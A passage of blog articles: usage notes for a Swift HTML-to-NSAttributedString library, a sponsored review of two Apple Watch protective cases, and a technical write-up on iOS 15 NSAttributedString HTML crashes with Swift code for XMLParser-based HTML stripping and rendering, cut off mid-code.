let parser = ZHTMLParserBuilder.initWithDefault().add(ExtendTagName("zhgchgli"), withCustomStyle: MarkupStyle(backgroundColor: MarkupStyleColor(name: .aquamarine))).build() // will use markupstyle you specify to render extend html tag <zhgchgli></zhgchgli>
let parser = ZHTMLParserBuilder.initWithDefault().add(B_HTMLTagName(), withCustomStyle: MarkupStyle(font: MarkupStyleFont(size: 18, weight: .style(.semibold)))).build() // will use markupstyle you specify to render <b></b> instead of default bold markup style
let attributedString = parser.render(htmlString) // NSAttributedString

// work with UITextView
textView.setHtmlString(htmlString)
// work with UILabel
label.setHtmlString(htmlString)
parser.stripper(htmlString)
let selector = parser.selector(htmlString) // HTMLSelector e.g. input: <a><b>Test</b>Link</a>
selector.first("a")?.first("b").attributedString // will return Test
selector.filter("a").attributedString // will return Test Link

// render from selector result
let selector = parser.selector(htmlString) // HTMLSelector e.g. input: <a><b>Test</b>Link</a>
parser.render(selector.first("a")?.first("b"))
Additionally, if you need to render long strings, you can use the async method to prevent UI blocking.
parser.render(String) { _ in }...
parser.stripper(String) { _ in }...
parser.selector(String) { _ in }...
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Catalyst Apple Watch Ultra-Thin Waterproof Case & Muvit Apple Watch Case
Thanks to Men’s Game for providing the Apple Watch Series 4 case for testing.
As a clumsy person with OCD, using a delicate product like the Apple Watch is very troublesome; due to my clumsiness, it’s easy to accidentally bump it, and with OCD, any scratches make me very uncomfortable. So, I immediately applied a full-coverage screen protector to prevent accidents.
But actually, just applying a full-coverage screen protector is not enough. The watch itself is curved, and the edges of the protector are fragile, easily chipping if the frame is accidentally rubbed:
Full-coverage screen protector chipping without a case
I am already on my third full-coverage screen protector; although the watch screen itself is undamaged, it still hurts. Perfect fit + no impact on touch + thin + high transparency + no edge lifting = very expensive ($990/piece). The money spent on protectors is almost enough to upgrade to the stainless steel version. Therefore, the Apple Watch case is very important to me, as it enhances the protection of the frame and reduces the risk of damage from bumps.
This article will unbox two Apple Watch cases and compare their experiences, functionality, appearance, and suitable scenarios. Let’s get started!
Left: Muvit Case / Right: Catalyst Case (with strap)
p.s. My watch model is: Apple Watch Series 4 (GPS + Cellular), 44mm Space Gray Aluminum Case with Black Sport Band
This case features an integrated design with a strap, providing comprehensive protection from wear to impact and water resistance.
Front of the box
100 meters waterproof / 360° full protection / 2 meters drop protection
Back of the box
IP-68 waterproof rating, each product tested at a depth of 100 meters, U.S. military-grade impact protection, direct screen operation, original sound quality for calls, can charge through the case, can detect heart rate through the case.
IP-68 ( Wiki ):
6 - Completely dustproof, no dust can enter, completely prevents contact.
8 - Immersion in water beyond 1m.
Contents
In addition to the Catalyst Apple Watch case (with a model inside), it comes with a small screwdriver for easy installation.
Protective Case (Including Strap) Body
Protective Case (Including Strap) Body Back
Comparison with Original Sport Band (L) (Left: Catalyst/Right: Original)
Fixed Ring Buckle
The length is similar to the original sport band (L) but with denser holes, allowing for a more adjustable fit to the wrist size; the fixed ring has a buckle to ensure it does not fall off during intense exercise.
We need to disassemble the Catalyst case first, then place the Apple Watch body inside and reassemble it.
Exploded View (Taken from Official Website)
Flip to the back and press the rectangular buckle with your fingernail, then push left or right!
When installing, make sure the waterproof case is properly fitted without wrinkles to avoid affecting waterproof performance.
Similarly, ensure there are no wrinkles to avoid affecting waterproof performance.
Snap back the body and screw it back ( Please do not over-tighten the screws! )
Test result: No problem, does not affect charging speed.
Left: With Case/Right: Bare Device
Test result: No problem, does not affect heart rate detection.
Apple Watch 4 full-screen display is unobstructed, no problem ✅
Can be used normally ✅
No significant differences ✅
Due to my large hands, I originally bought the largest 44mm version of the watch. After adding the protective case, it looks even more rugged and grand.
This watch strap truly provides 360° comprehensive protection and enhances its waterproof function to adapt to more challenging environments.
The strap is made of skin-friendly material, making it feel no different from the original sports strap. However, the adjustment part of the strap has denser holes, allowing for a more suitable size (the original strap either felt too loose or too tight for me). The buckle on the fixing ring also gives me more peace of mind as someone with OCD!
The overall appearance is wild and rugged, making it perfect for outdoor activities, hiking, rock climbing, and diving. These are also the scenarios where this strap can provide the maximum protective effect!
Remember to bring sunglasses next time, the sun is super bright
Catalyst family photo ( AirPods case )
The second product I tried is the Muvit Apple Watch Protective Case. Compared to the professional protection of Catalyst, this one is simpler and more convenient, suitable for various daily life scenarios. Despite this, Muvit still passed the U.S. military standard MIL-STD 810G 3-meter drop test, ensuring safety and protection!
Front of the box
Two different color protective cases: Left - Black / Right - Light Purple
U.S. military standard MIL-STD 810G 3-meter drop test, extremely light 2.3G
Back of the box
Dual-layer structure protection, silicone shock-absorbing layer, polycarbonate buffering system, screen frame protection
Contents
Protective case body, black/light purple
Flip to the back and press the rectangular buckle with your fingernail, then push left or right!
Black version
Light purple version
Try-on, left: black / right: light purple
Digital Crown:
Works normally ✅. Other functions like audio, heart rate, display, etc., are not affected as this is just a frame protective case, so no special tests are needed!
The most satisfying aspect of using this protective case is that I can quickly and conveniently switch straps according to different life scenarios (leather strap for suits, sports strap for daily use). It’s easy to install and remove, and its protection is sufficient for all daily scenarios (housework, cleaning, moving things). Currently, I use this protective case for my daily life.
Paired with a leather strap
It has been over 4 months from receiving the trial to writing this article. During this period, I moved houses (Sorry… the scenes in this article are messy), participated in a duathlon (10KM running + 40KM cycling), and went diving in Malaysia. These two protective cases have accompanied me through various activities, and the full-coverage screen protector is still perfect!
Remember how many screen protectors I changed? The answer is 3 in 3 months, averaging less than a month before they somehow got damaged and chipped. Each one costs $990 Orz
I can only say it’s a regret meeting late. If I had known about protective cases earlier, I wouldn’t have wasted so much money!
Both Catalyst and Muvit have solved my problem of constantly chipping screen protectors. If you don’t use a screen protector, you should definitely get a protective case to protect the screen edges; otherwise, a cracked screen will hurt even more.
For recommendations, if you often engage in intense sports (rock climbing, diving) or labor work, I suggest choosing Catalyst for better peace of mind. If you’re just an office worker, occasionally run, and like to change watch bands according to your mood, then Muvit is sufficient!
Here is a simple comparison table for your reference:
From the first complete unboxing to three months of use, it’s been almost a year since I’ve been wearing my Apple Watch S4. There haven’t been many changes in usage; third-party apps are still scarce, and the most frequently used features are still Apple Pay, unlocking the Mac, and checking notifications. The Apple Watch has integrated into my daily life, and I’ve gotten used to its convenience.
By the way, let’s look forward to Watch OS 6 together :)
In the past six months, I’ve been more diligent in utilizing the Apple Watch’s fitness features, recording running and cycling times, routes, and heart rates. Besides recording, the awards make exercising more goal-oriented and fulfilling. Competing with friends or sharing results on social media makes exercising fun and easier to maintain!
Awards, Competitions, Exercise Routes, Exercise Status
Special thanks to Men’s Game for providing the Apple Watch Series 4 protective case for testing.
Check out »> AirPods 2 Unboxing and Hands-On Experience
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
An alternative to iOS NSAttributedString DocumentType.html
Photo by Florian Olivo
Re-developed using another method, 「ZMarkupParser HTML String to NSAttributedString Tool」; for technical details and development stories, please visit 「The Story of Handcrafting an HTML Parser」.
Since the release of iOS 15 last year, the app has been plagued by a crash issue that has topped the charts for a long time. According to the data, in the past 90 days (2022/03/11~2022/06/08), it caused over 2.4K crashes, affecting over 1.4K users.
From the data, it appears that this massive crash issue has been fixed (or the occurrence rate has been reduced) in subsequent versions of iOS ≥ 15.2, as the trend is showing a decline.
Most affected versions: iOS 15.0.X ~ iOS 15.X.X
Additionally, there were sporadic crashes found in iOS 12 and iOS 13, indicating that this issue has existed for a long time, but the occurrence rate in the early versions of iOS 15 was almost 100%.
<compiler-generated> line 2147483647 specialized @nonobjc NSAttributedString.init(data:options:documentAttributes:)
NSAttributedString crashes during init with Crashed: com.apple.main-thread EXC_BREAKPOINT 0x00000001de9d4e44. It is also possible that the operation was not on the Main Thread.
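For the main-thread part, a minimal sketch of my own (an assumption, not the app's actual code) showing how the DocumentType.html initializer can be kept on the main thread, where Apple requires the HTML importer to run:

import UIKit

// A minimal sketch: dispatch the HTML import to the main thread before calling the initializer.
func makeAttributedString(fromHTML html: String, completion: @escaping (NSAttributedString?) -> Void) {
    DispatchQueue.main.async {
        guard let data = html.data(using: .utf8) else {
            completion(nil)
            return
        }
        let result = try? NSAttributedString(
            data: data,
            options: [.documentType: NSAttributedString.DocumentType.html,
                      .characterEncoding: String.Encoding.utf8.rawValue],
            documentAttributes: nil)
        completion(result)
    }
}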
When this issue first appeared massively, it puzzled the development team; re-testing the crash points in the Crash Log showed no problems, and it was unclear under what circumstances the users encountered the issue. Until one day, by chance, I switched to “Low Power Mode” and triggered the issue! WTF!!!
After some searching, I found many similar cases online and also found the earliest similar crash issue question on the App Developer Forums, with an official response:
Rendering constraints means limiting the rendering formats that the app can support, such as only supporting bold, italic, hyperlinks.
You can coordinate with the backend to create an interface:
{
  "content":[
    {"type":"text","value":"Paragraph 1 plain text"},
    {"type":"text","value":"Paragraph 2 plain text"},
    {"type":"text","value":"Paragraph 3 plain text"},
    {"type":"text","value":"Paragraph 4 plain text"},
    {"type":"image","src":"https://zhgchg.li/logo.png","title":"ZhgChgLi"},
    {"type":"text","value":"Paragraph 5 plain text"}
  ]
}
You can combine it with Markdown to support text rendering, or refer to Medium’s approach:
"Paragraph": {
  "text": "code in text, and link in text, and ZhgChgLi, and bold, and I, only i",
  "markups": [
    {
      "type": "CODE",
      "start": 5,
      "end": 7
    },
    {
      "start": 18,
      "end": 22,
      "href": "http://zhgchg.li",
      "type": "LINK"
    },
    {
      "type": "STRONG",
      "start": 50,
      "end": 63
    },
    {
      "type": "EM",
      "start": 55,
      "end": 69
    }
  ]
}
This means that for the text code in text, and link in text, and ZhgChgLi, and bold, and I, only i:
- Characters 5 to 7 should be marked as code (wrapped in `Text` format)
- Characters 18 to 22 should be marked as a link (wrapped in [Text](URL) format)
- Characters 50 to 63 should be marked as bold (wrapped in *Text* format)
- Characters 55 to 69 should be marked as italic (wrapped in _Text_ format)
With a standardized and describable structure, the app can use native methods to render, achieving optimal performance and user experience.
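To make the idea concrete, here is a minimal sketch of my own, with assumed type names, neither Medium's nor the app's actual code, showing how such range-based markups could be applied natively:

import UIKit

// A minimal sketch: apply range-based markups from a JSON interface onto a native NSAttributedString.
struct Markup: Decodable {
    let type: String    // e.g. "STRONG", "EM", "LINK", "CODE"
    let start: Int
    let end: Int
    let href: String?
}

func render(text: String, markups: [Markup], baseFont: UIFont = .systemFont(ofSize: 16)) -> NSAttributedString {
    let result = NSMutableAttributedString(string: text, attributes: [.font: baseFont])
    for markup in markups {
        // Note: a production implementation should map character offsets to UTF-16 offsets
        // and merge font traits when ranges overlap (e.g. STRONG + EM).
        guard markup.start >= 0, markup.end <= result.length, markup.end > markup.start else { continue }
        let range = NSRange(location: markup.start, length: markup.end - markup.start)
        switch markup.type {
        case "STRONG":
            result.addAttribute(.font, value: UIFont.boldSystemFont(ofSize: baseFont.pointSize), range: range)
        case "EM":
            result.addAttribute(.font, value: UIFont.italicSystemFont(ofSize: baseFont.pointSize), range: range)
        case "CODE":
            result.addAttribute(.font, value: UIFont.monospacedSystemFont(ofSize: baseFont.pointSize, weight: .regular), range: range)
        case "LINK":
            if let href = markup.href, let url = URL(string: href) {
                result.addAttribute(.link, value: url, range: range)
            }
        default:
            break
        }
    }
    return result
}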
For the pitfalls of using UITextView for text wrapping, you can refer to my previous article: iOS UITextView Text Wrapping Editor (Swift)
Before implementing the solution, let’s first explore the problem itself. Personally, I believe the main cause of this issue is not from Apple; the official bug is just the trigger point.
The main problem comes from treating the app as a web renderer. The advantage is that web development is fast, the same API endpoint can serve HTML to all clients without distinction, and any content can be rendered flexibly. The disadvantages are that HTML is not a natural interface for apps; you can't expect app engineers to understand HTML; performance is extremely poor and rendering can only run on the main thread; the result cannot be predicted at development time; and it is difficult to pin down the supported specifications.
Looking further into the problem, it often stems from unclear original requirements, uncertainty about which specifications the app needs to support, and the pursuit of speed, leading to the direct use of HTML as the interface between the app and the web.
Supplementing the performance part: actual tests show a 5 to 20 times speed difference between using NSAttributedString DocumentType.html directly and implementing the rendering yourself.
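If you want to measure this on your own content, a rough sketch of my own (not the author's benchmark code; the repeated HTML is just sample input):

import UIKit

// A minimal measurement sketch: time the DocumentType.html path;
// the same pattern can be used to time any custom renderer for comparison.
func measure(_ label: String, _ block: () -> Void) {
    let start = CFAbsoluteTimeGetCurrent()
    block()
    print("\(label): \(CFAbsoluteTimeGetCurrent() - start) seconds")
}

let html = String(repeating: "<b>Hello</b><i>World</i>", count: 500)

measure("DocumentType.html") {
    let data = html.data(using: .utf8)!
    _ = try? NSAttributedString(
        data: data,
        options: [.documentType: NSAttributedString.DocumentType.html,
                  .characterEncoding: String.Encoding.utf8.rawValue],
        documentAttributes: nil)
}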
Since it is for App use, a better approach should be based on App development methods. For Apps, the cost of adjusting requirements is much higher than for the Web; effective App development should be based on iterative adjustments with specifications. At the moment, we need to confirm the specifications that can be supported (e.g., only <b>/<i>/<a>/<u>, and this must be explicitly communicated to the developers in the program). If we need to change them later, we will schedule time to expand the specifications. We cannot quickly change them as we wish, which reduces communication costs and increases work efficiency.
, and it must be explicitly informed to the developers in the program)Updated approach, no longer using XMLParser, due to zero tolerance for errors:
<br>
/ <Congratulation!>
/ <b>Bold<i>Bold+Italic</b>Italic</i>
The above three possible scenarios will all cause XMLParser to throw an error and display blank. Using XMLParser, the HTML string must fully comply with XML rules, unlike browsers or NSAttributedString.DocumentType.html which can tolerate errors and display normally.
Switch to pure Swift development, parsing HTML tags through Regex and Tokenization, analyzing and correcting tag correctness (correcting tags without end & misplaced tags), then converting them into an abstract syntax tree, and finally using the Visitor Pattern to map HTML tags to abstract styles, obtaining the final NSAttributedString result; without relying on any Parser Lib.
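As a rough illustration of the tokenization step only, here is a simplified sketch of my own, not ZMarkupParser's actual implementation:

import Foundation

// A simplified sketch of regex-based HTML tokenization:
// split an HTML string into start tags, end tags, and plain text.
enum HTMLToken {
    case startTag(String)
    case endTag(String)
    case text(String)
}

func tokenize(_ html: String) -> [HTMLToken] {
    // Group 1 captures an optional "/", group 2 captures the tag name; everything else is text.
    guard let regex = try? NSRegularExpression(pattern: "<(/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*?>") else {
        return [.text(html)]
    }

    var tokens: [HTMLToken] = []
    var cursor = html.startIndex
    let fullRange = NSRange(html.startIndex..<html.endIndex, in: html)

    regex.enumerateMatches(in: html, range: fullRange) { match, _, _ in
        guard let match = match,
              let tagRange = Range(match.range, in: html),
              let slashRange = Range(match.range(at: 1), in: html),
              let nameRange = Range(match.range(at: 2), in: html) else { return }

        if cursor < tagRange.lowerBound {
            tokens.append(.text(String(html[cursor..<tagRange.lowerBound])))
        }
        let name = String(html[nameRange]).lowercased()
        tokens.append(html[slashRange].isEmpty ? .startTag(name) : .endTag(name))
        cursor = tagRange.upperBound
    }
    if cursor < html.endIndex {
        tokens.append(.text(String(html[cursor..<html.endIndex])))
    }
    return tokens
}

// tokenize("<b>Bold<i>Bold+Italic</b>Italic</i>")
// -> startTag(b), text(Bold), startTag(i), text(Bold+Italic), endTag(b), text(Italic), endTag(i)
// A later stage can then correct the misplaced </b>, build an abstract syntax tree,
// and visit it to produce the final NSAttributedString.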
— —
The die is cast, back to the main topic. Currently, we are using HTML to render NSAttributedString, so how do we solve the above crash and performance issues?
Before talking about HTML rendering, let's talk about stripping HTML again. As mentioned in the Why? section, where the App will get HTML and what kind of HTML it will get should be specified in the specifications, rather than the App "possibly" getting HTML and needing to strip it.
As a former supervisor said: Isn’t this too crazy?
let data = "<div>Text</div>".data(using: .unicode)!
let attributed = try NSAttributedString(data: data, options: [.documentType: NSAttributedString.DocumentType.html, .characterEncoding: String.Encoding.utf8.rawValue], documentAttributes: nil)
let string = attributed.string
htmlString = "<div>Test</div>"
htmlString.replacingOccurrences(of: "<[^>]+>", with: "", options: .regularExpression, range: nil)

<p foo=">now what?">Paragraph</p> is valid HTML but will be stripped incorrectly.
Refer to the approach of SwiftRichString, using XMLParser from Foundation to parse HTML as XML and implement HTML Parser & Strip functionality.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+
import UIKit
// Ref: https://github.com/malcommac/SwiftRichString
// XMLParserInitError / XMLParserError are simple custom Error types defined elsewhere in the project.
final class HTMLStripper: NSObject, XMLParserDelegate {

    private static let topTag = "source"
    private var xmlParser: XMLParser

    private(set) var storedString: String

    // The XML parser sometimes splits strings, which can break localization-sensitive
    // string transforms. Work around this by using the currentString variable to
    // accumulate partial strings, and then reading them back out as a single string
    // when the current element ends, or when a new one is started.
    private var currentString: String?

    // MARK: - Initialization

    init(string: String) throws {
        let xmlString = HTMLStripper.escapeWithUnicodeEntities(string)
        let xml = "<\(HTMLStripper.topTag)>\(xmlString)</\(HTMLStripper.topTag)>"
        guard let data = xml.data(using: String.Encoding.utf8) else {
            throw XMLParserInitError("Unable to convert to UTF8")
        }

        self.xmlParser = XMLParser(data: data)
        self.storedString = ""

        super.init()

        xmlParser.shouldProcessNamespaces = false
        xmlParser.shouldReportNamespacePrefixes = false
        xmlParser.shouldResolveExternalEntities = false
        xmlParser.delegate = self
    }

    /// Parse and generate the stripped string.
    func parse() throws -> String {
        guard xmlParser.parse() else {
            let line = xmlParser.lineNumber
            let shiftColumn = (line == 1)
            let shiftSize = HTMLStripper.topTag.lengthOfBytes(using: String.Encoding.utf8) + 2
            let column = xmlParser.columnNumber - (shiftColumn ? shiftSize : 0)

            throw XMLParserError(parserError: xmlParser.parserError, line: line, column: column)
        }

        return storedString
    }

    // MARK: XMLParserDelegate

    @objc func parser(_ parser: XMLParser, didStartElement elementName: String, namespaceURI: String?, qualifiedName qName: String?, attributes attributeDict: [String: String]) {
        foundNewString()
    }

    @objc func parser(_ parser: XMLParser, didEndElement elementName: String, namespaceURI: String?, qualifiedName qName: String?) {
        foundNewString()
    }

    @objc func parser(_ parser: XMLParser, foundCharacters string: String) {
        currentString = (currentString ?? "").appending(string)
    }

    // MARK: Support Private Methods

    func foundNewString() {
        if let currentString = currentString {
            storedString.append(currentString)
            self.currentString = nil
        }
    }

    // handle html entity / html hex
    // Perform string escaping to replace all characters which are not supported by NSXMLParser
    // into the specified encoding with decimal entity.
    // For example if your string contains the '&' character the parser will break the style.
    // This option is active by default.
    // ref: https://github.com/malcommac/SwiftRichString/blob/e0b72d5c96968d7802856d2be096202c9798e8d1/Sources/SwiftRichString/Support/XMLStringBuilder.swift
    static func escapeWithUnicodeEntities(_ string: String) -> String {
        guard let escapeAmpRegExp = try? NSRegularExpression(pattern: "&(?!(#[0-9]{2,4}|[A-z]{2,6});)", options: NSRegularExpression.Options(rawValue: 0)) else {
            return string
        }

        let range = NSRange(location: 0, length: string.utf16.count)
        return escapeAmpRegExp.stringByReplacingMatches(in: string,
                                                        options: NSRegularExpression.MatchingOptions(rawValue: 0),
                                                        range: range,
                                                        withTemplate: "&amp;")
    }
}


let test = "我<br/><a href=\"http://google.com\">同意</a>提供<b><i>個</i>人</b>身分證字號/護照/居留<span style=\"color:#FF0000;font-size:20px;word-spacing:10px;line-height:10px\">證號碼</span>,以供<i>跨境物流</i>方通關<span style=\"background-color:#00FF00;\">使用</span>,並已<img src=\"g.png\"/>了解跨境<br/>商品之物<p>流需</p>求"

let stripper = try HTMLStripper(string: test)
print(try! stripper.parse())

// I agree to provide personal ID number/passport/residence permit number for cross-border logistics customs clearance, and have understood the logistics requirements of cross-border goods.
We use Foundation's XMLParser to process the string and implement XMLParserDelegate. currentString accumulates the characters, because the parser may split one string into several pieces and call foundCharacters repeatedly. didStartElement and didEndElement mark the start and end of an element; at those points we append the accumulated result to storedString and clear currentString.
g -> g
<br> should be written as <br/>
Personally, I think Option 2 is a better method for simply stripping HTML. This method is introduced because rendering HTML also uses the same principle. Let’s use this as a simple example :)
Using XMLParser to implement it yourself, following the same principle as stripping, we can add corresponding rendering methods when parsing certain tags.
Requirements:
Support specific HTML tags, e.g. the <a> tag.
Support the style attribute, since the HTML will explicitly carry the style to display, e.g. style="color:red".
You can trim the functionality to your own requirements; for example, if you don't need to support background color adjustment, you don't need to expose a background-color setting.
This article is just a conceptual implementation, not the best practice in architecture; if you have clear specifications and usage, you can consider applying some Design Patterns to achieve good maintainability and extensibility.
Again, if your App is new or has the opportunity to switch entirely to Markdown format, it is recommended to adopt the above method. Writing your own renderer is too complex and will not perform better than Markdown.
Even if you are on iOS < 15 and do not support native Markdown, you can still find a great Markdown Parser solution on Github.
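For reference, the native path on iOS 15 and later is only a few lines (a minimal sketch; the Markdown string here is just an example):

import UIKit

// Minimal sketch of the native Markdown path (iOS >= 15).
if #available(iOS 15.0, *) {
    let markdown = "I **agree** to provide my ID number, see the [terms](https://example.com)."
    if let attributed = try? AttributedString(markdown: markdown) {
        let label = UILabel()
        label.attributedText = NSAttributedString(attributed)
    }
}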
protocol HTMLTagParser {
    static var tag: String { get } // Declare the Tag Name to be parsed, e.g. a
    var storedHTMLAttributes: [String: String]? { get set } // The parsed attributes will be stored here, e.g. href, style
    var style: AttributedStringStyle? { get } // The style to be applied to this Tag

    func render(attributedString: inout NSMutableAttributedString) // Implement the logic to render HTML to attributedString
}
Declare a protocol for the HTML tags that can be parsed, for easy extension and management.
protocol AttributedStringStyle {
    var font: UIFont? { get set }
    var color: UIColor? { get set }
    var backgroundColor: UIColor? { get set }
    var wordSpacing: CGFloat? { get set }
    var paragraphStyle: NSParagraphStyle? { get set }
    var customs: [NSAttributedString.Key: Any]? { get set } // Universal setting; it is recommended to abstract it out and close this opening once the supported specification is confirmed
    func render(attributedString: inout NSMutableAttributedString)
}

// abstract implement
extension AttributedStringStyle {
    func render(attributedString: inout NSMutableAttributedString) {
        let range = NSMakeRange(0, attributedString.length)
        if let font = font {
            attributedString.addAttribute(NSAttributedString.Key.font, value: font, range: range)
        }
        if let color = color {
            attributedString.addAttribute(NSAttributedString.Key.foregroundColor, value: color, range: range)
        }
        if let backgroundColor = backgroundColor {
            attributedString.addAttribute(NSAttributedString.Key.backgroundColor, value: backgroundColor, range: range)
        }
        if let wordSpacing = wordSpacing {
            attributedString.addAttribute(NSAttributedString.Key.kern, value: wordSpacing as Any, range: range)
        }
        if let paragraphStyle = paragraphStyle {
            attributedString.addAttribute(NSAttributedString.Key.paragraphStyle, value: paragraphStyle, range: range)
        }
        if let customAttributes = customs {
            attributedString.addAttributes(customAttributes, range: range)
        }
    }
}
Declare the styles that can be set for the Tag.
// only support the tag attributes listed below
// can set color, font size, line height, word spacing, background color

enum HTMLStyleAttributedParser: String {
    case color = "color"
    case fontSize = "font-size"
    case lineHeight = "line-height"
    case wordSpacing = "word-spacing"
    case backgroundColor = "background-color"

    func render(attributedString: inout NSMutableAttributedString, value: String) -> Bool {
        let range = NSMakeRange(0, attributedString.length)
        switch self {
        case .color:
            if let color = convertToiOSColor(value) {
                attributedString.addAttribute(NSAttributedString.Key.foregroundColor, value: color, range: range)
                return true
            }
        case .backgroundColor:
            if let color = convertToiOSColor(value) {
                attributedString.addAttribute(NSAttributedString.Key.backgroundColor, value: color, range: range)
                return true
            }
        case .fontSize:
            if let size = convertToiOSSize(value) {
                attributedString.addAttribute(NSAttributedString.Key.font, value: UIFont.systemFont(ofSize: CGFloat(size)), range: range)
                return true
            }
        case .lineHeight:
            if let size = convertToiOSSize(value) {
                let paragraphStyle = NSMutableParagraphStyle()
                paragraphStyle.lineSpacing = size
                attributedString.addAttribute(NSAttributedString.Key.paragraphStyle, value: paragraphStyle, range: range)
                return true
            }
        case .wordSpacing:
            if let size = convertToiOSSize(value) {
                attributedString.addAttribute(NSAttributedString.Key.kern, value: size, range: range)
                return true
            }
        }

        return false
    }

    // convert 36px -> 36
    private func convertToiOSSize(_ string: String) -> CGFloat? {
        guard let regex = try? NSRegularExpression(pattern: "^([0-9]+)"),
              let firstMatch = regex.firstMatch(in: string, options: [], range: NSRange(location: 0, length: string.utf16.count)),
              let range = Range(firstMatch.range, in: string),
              let size = Float(String(string[range])) else {
            return nil
        }
        return CGFloat(size)
    }

    // convert html hex color #ffffff to UIKit Color
    private func convertToiOSColor(_ hexString: String) -> UIColor? {
        var cString: String = hexString.trimmingCharacters(in: .whitespacesAndNewlines).uppercased()

        if cString.hasPrefix("#") {
            cString.remove(at: cString.startIndex)
        }

        if (cString.count) != 6 {
            return nil
        }

        var rgbValue: UInt64 = 0
        Scanner(string: cString).scanHexInt64(&rgbValue)

        return UIColor(
            red: CGFloat((rgbValue & 0xFF0000) >> 16) / 255.0,
            green: CGFloat((rgbValue & 0x00FF00) >> 8) / 255.0,
            blue: CGFloat(rgbValue & 0x0000FF) / 255.0,
            alpha: CGFloat(1.0)
        )
    }
}
Implement a style-attribute parser to handle style="color:red;font-size:16px". CSS has many configurable properties, so we need to enumerate the supported set.
extension HTMLTagParser {

    func render(attributedString: inout NSMutableAttributedString) {
        defaultStyleRender(attributedString: &attributedString)
    }

    func defaultStyleRender(attributedString: inout NSMutableAttributedString) {
        // setup default style to NSMutableAttributedString
        style?.render(attributedString: &attributedString)

        // setup & override HTML style (style="color:red;background-color:black") on the NSMutableAttributedString if it exists
        // any html tag can have a style attribute
        if let style = storedHTMLAttributes?["style"] {
            let styles = style.split(separator: ";").map { $0.split(separator: ":") }.filter { $0.count == 2 }
            for style in styles {
                let key = String(style[0])
                let value = String(style[1])

                if let styleAttributed = HTMLStyleAttributedParser(rawValue: key), styleAttributed.render(attributedString: &attributedString, value: value) {
                    // rendered successfully
                } else {
                    print("Unsupported style attribute or value [\(key):\(value)]")
                }
            }
        }
    }
}
Apply HTMLStyleAttributedParser inside the default (abstract) implementation of HTMLTagParser.
struct LinkStyle: AttributedStringStyle {
    var font: UIFont? = UIFont.systemFont(ofSize: 14)
    var color: UIColor? = UIColor.blue
    var backgroundColor: UIColor? = nil
    var wordSpacing: CGFloat? = nil
    var paragraphStyle: NSParagraphStyle?
    var customs: [NSAttributedString.Key: Any]? = [.underlineStyle: NSUnderlineStyle.single.rawValue]
}

struct ATagParser: HTMLTagParser {
    // <a></a>
    static let tag: String = "a"
    var storedHTMLAttributes: [String: String]? = nil
    let style: AttributedStringStyle? = LinkStyle()

    func render(attributedString: inout NSMutableAttributedString) {
        defaultStyleRender(attributedString: &attributedString)
        if let href = storedHTMLAttributes?["href"], let url = URL(string: href) {
            let range = NSMakeRange(0, attributedString.length)
            attributedString.addAttribute(NSAttributedString.Key.link, value: url, range: range)
        }
    }
}

struct BoldStyle: AttributedStringStyle {
    var font: UIFont? = UIFont.systemFont(ofSize: 14, weight: .bold)
    var color: UIColor? = UIColor.black
    var backgroundColor: UIColor? = nil
    var wordSpacing: CGFloat? = nil
    var paragraphStyle: NSParagraphStyle?
    var customs: [NSAttributedString.Key: Any]? = [.underlineStyle: NSUnderlineStyle.single.rawValue]
}

struct BoldTagParser: HTMLTagParser {
    // <b></b>
    static let tag: String = "b"
    var storedHTMLAttributes: [String: String]? = nil
    let style: AttributedStringStyle? = BoldStyle()
}
// Ref: https://github.com/malcommac/SwiftRichString
final class HTMLToAttributedStringParser: NSObject {

    private static let topTag = "source"
    private var xmlParser: XMLParser?

    private(set) var attributedString: NSMutableAttributedString = NSMutableAttributedString()
    private(set) var supportedTagRenders: [HTMLTagParser] = []
    private let defaultStyle: AttributedStringStyle

    /// Styles applied at each fragment.
    private var renderingTagRenders: [HTMLTagParser] = []

    // The XML parser sometimes splits strings, which can break localization-sensitive
    // string transforms. Work around this by using the currentString variable to
    // accumulate partial strings, and then reading them back out as a single string
    // when the current element ends, or when a new one is started.
    private var currentString: String?

    // MARK: - Initialization

    init(defaultStyle: AttributedStringStyle) {
        self.defaultStyle = defaultStyle
        super.init()
    }

    func register(_ tagRender: HTMLTagParser) {
        if let index = supportedTagRenders.firstIndex(where: { type(of: $0).tag == type(of: tagRender).tag }) {
            supportedTagRenders.remove(at: index)
        }
        supportedTagRenders.append(tagRender)
    }

    /// Parse and generate attributed string.
    func parse(string: String) throws -> NSAttributedString {
        var xmlString = HTMLToAttributedStringParser.escapeWithUnicodeEntities(string)

        // make sure the <br/> format is correct XML
        // because the Web may use <br> to present <br/>, but <br> is not valid XML
        xmlString = xmlString.replacingOccurrences(of: "<br>", with: "<br/>")

        let xml = "<\(HTMLToAttributedStringParser.topTag)>\(xmlString)</\(HTMLToAttributedStringParser.topTag)>"
        guard let data = xml.data(using: String.Encoding.utf8) else {
            throw XMLParserInitError("Unable to convert to UTF8")
        }

        let xmlParser = XMLParser(data: data)
        xmlParser.shouldProcessNamespaces = false
        xmlParser.shouldReportNamespacePrefixes = false
        xmlParser.shouldResolveExternalEntities = false
        xmlParser.delegate = self
        self.xmlParser = xmlParser

        attributedString = NSMutableAttributedString()

        guard xmlParser.parse() else {
            let line = xmlParser.lineNumber
            let shiftColumn = (line == 1)
            let shiftSize = HTMLToAttributedStringParser.topTag.lengthOfBytes(using: String.Encoding.utf8) + 2
            let column = xmlParser.columnNumber - (shiftColumn ? shiftSize : 0)

            throw XMLParserError(parserError: xmlParser.parserError, line: line, column: column)
        }

        return attributedString
    }
}

// MARK: Private Method

private extension HTMLToAttributedStringParser {
    func enter(element elementName: String, attributes: [String: String]) {
        // elementName = tagName, EX: a,span,div...
        guard elementName != HTMLToAttributedStringParser.topTag else {
            return
        }

        if let index = supportedTagRenders.firstIndex(where: { type(of: $0).tag == elementName }) {
            var tagRender = supportedTagRenders[index]
